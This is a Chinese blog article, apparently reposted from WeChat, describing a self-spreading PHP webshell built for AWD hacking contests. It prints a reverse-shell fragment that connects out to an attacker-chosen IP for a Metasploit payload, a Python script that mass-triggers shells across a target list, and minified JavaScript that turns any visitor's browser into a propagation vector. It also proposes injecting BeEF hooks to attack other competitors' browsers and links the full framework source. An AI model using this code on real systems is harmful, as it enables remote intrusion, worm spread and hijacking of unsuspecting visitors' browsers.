基于AWD比赛的蠕虫webshell(三)

基于AWD比赛的蠕虫webshell(三)
2019-10-25 11:53:32 Author: mp.weixin.qq.com(查看原文) 阅读量:85 收藏

适配msf、前端传播与awd中蠕虫webshell的反渗透思路

历史文章：
蠕虫webshell代码功能详情：基于AWD比赛的蠕虫webshell
蠕虫webshell复活框架：基于AWD比赛的蠕虫webshell(二)

0x00 适配meterpreter

为了防止其他意外情况比如说有一些意外的情况，某些不支持命令执行函数，如禁用assert，system函数等等，使用msfvemon生成php的马，整合到蠕虫webshell当中，增加一个判断参数"_r"是否要反弹shell。

0x01 主要代码

elseif(isset($_GET['_r'])){if (($f = 'stream_socket_client') && is_callable($f)) {    $s = $f("tcp://{$ip}:{$port}");    $s_type = 'stream';}if (!$s && ($f = 'fsockopen') && is_callable($f)) {    $s = $f($ip, $port);    $s_type = 'stream';}if (!$s && ($f = 'socket_create') && is_callable($f)) {    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);    $res = @socket_connect($s, $ip, $port);    if (!$res) {        die();    }    $s_type = 'socket';}if (!$s_type) {    die('no socket funcs');}if (!$s) {    die('no socket');}switch ($s_type) {    case 'stream':        $len = fread($s, 4);        break;    case 'socket':        $len = socket_read($s, 4);        break;}if (!$len) {    die();}$a = unpack("Nlen", $len);$len = $a['len'];$b = '';while (strlen($b) < $len) {    switch ($s_type) {        case 'stream':            $b.= fread($s, $len - strlen($b));            break;
        case 'socket':            $b.= socket_read($s, $len - strlen($b));            break;    }}

0x02 批量反弹shell

每个被感染的页面都可以加_r参数进行访问即可反弹shell到msf

批量访问http://192.168.1.X/.Conf_check.php?_r后反弹shell到msf，meterpreter产生多个会话后，可以批量执行命令。

#!/usr/bin/python# -*- coding: UTF-8 -*-#writed by 3s_NwGeekimport requests,base64from gevent import monkeyfrom gevent.pool import Poolmonkey.patch_all()
targets = open("C:\Users\\3s_NwGeek\Desktop\\target.txt").read().splitlines()  #批量目标local_bind_ip='192.168.3.1'#上传提交地址change_url = "http://TARGET-IP/.Conf_check.php?_r=%s"%(base64.b64encode(local_bind_ip))

def main(target):    try:        changeurl = change_url.replace('TARGET-IP', target)  #页面的url        head = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',                'Connection': 'close',                'Upgrade-Insecure-Requests': '1',                'Cache-Control': 'max-age=0'}
        requests.get(changeurl, headers=head,timeout=0.1)    except Exception as e:        print target,' : request was send'        pass
if __name__ == '__main__':    # main()    pool = Pool(len(targets))  #批量    pool.map(main, targets)

msfconsole命令: Msf5 exploit（multi/handler）>sessions -c whoami

0x03 前端传播

为了方便更快速掌控，增加了前端传播功能，也就是现场比赛选手浏览者只要打开一个被蠕虫webshell感染的页面会自动循环跳转带参数“_”原生ajax请求进行传播。
成功感染的php文件首先会带?_参数重新访问本页面。
带这个参数访问会返回所有php文件的url，返回格式会带着eviltag标签，方便js提取。最终会循环随机访问
在比赛举办方和其他队伍的流量监控中也不是只有一个人发起这种流量特征了，有一点点的混淆视听作用。

0x04 前端代码

//循环function sleep(delay) {    var start = new Date().getTime();    while (new Date().getTime() < start + delay);}function trans() {    const rurl = document.getElementsByTagName("eviltag")[Math.ceil(Math.random() * document.getElementsByTagName("eviltag").length)].innerHTML + "?_";    const rq = new XMLHttpRequest();    rq.open("get", rurl, false);    rq.send();}#判断是否带“_”参数if (window.location.href.indexOf("?_") == -1) {    location.replace(window.location.href + "?_")} else {    while (true) {        try {            trans()        } catch(e) {            console.log(e)        };        sleep(3000)    }}

为了方便，我把它压缩成一行：

function sleep(delay){var start=new Date().getTime();while(new Date().getTime()<start+delay)}function trans(){const rurl=document.getElementsByTagName("eviltag")[Math.ceil(Math.random()*document.getElementsByTagName("eviltag").length)].innerHTML+"?_";const rq=new XMLHttpRequest();rq.open("get",rurl,false);rq.send()}if(window.location.href.indexOf("?_")==-1){location.replace(window.location.href+"?_")}else{while(true){try{trans()}catch(e){console.log(e)};sleep(3000)}}

0x05 应用示范

正常访问php页面http://192.168.1.128/login.php的时候，js控制前端跳转http://192.168.1.128/login.php?_自动加了参数?_访问，带了?_参数访问后，每5秒发起ajax请求其他php页面，做到只要别人访问靶机任何php页面，就可以让他人帮助你进行传播蠕虫webshell。

0x06 反渗透思路

在蠕虫webshell代码中加入beef框架中的hook.js，结合蠕虫webshell感染本地所有php页面的属性，无论选手们查看哪个页面，只要访问靶机（比赛中肯定要访问一下靶机吧），就可以反攻在场的每位参赛选手。
由于比赛人员大多为安全测试人员，平时工作为了测试漏洞，使用一些旧版的火狐（为了使用旧版hackbar）或者ie，这就增大了我们反攻RCE成功的几率。
在比赛的时候，一旦靶机中了蠕虫webshell，比赛选手们浏览正常的网页的时候，就被我们hook住为所欲为了。
但由于加上前端传播的js代码，实测再加hook.js浏览器很容易卡或者崩溃，大家都是安全人员很容易被发现。
为了用户体验这部分内容没加上去。不过目前比赛中还没见到规则说不能反渗透或者参赛选手电脑。

0x07 蠕虫webshell框架源码

项目地址
https://github.com/3sNwgeek/awd_worm_phpwebshell_framework/

别忘了投稿哦

大家有好的技术原创文章

欢迎投稿至邮箱：[email protected]

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦

有才能的你快来投稿吧！

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦！

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652852470&idx=1&sn=b46f3c5c293cbc073f16fbc8d69ca984&chksm=bd592c3b8a2ea52dddb139a99bb163bb1786aef7eece95645f0128150f8dc3935abdb33c0cad#rd
如有侵权请联系:admin#unsafe.sh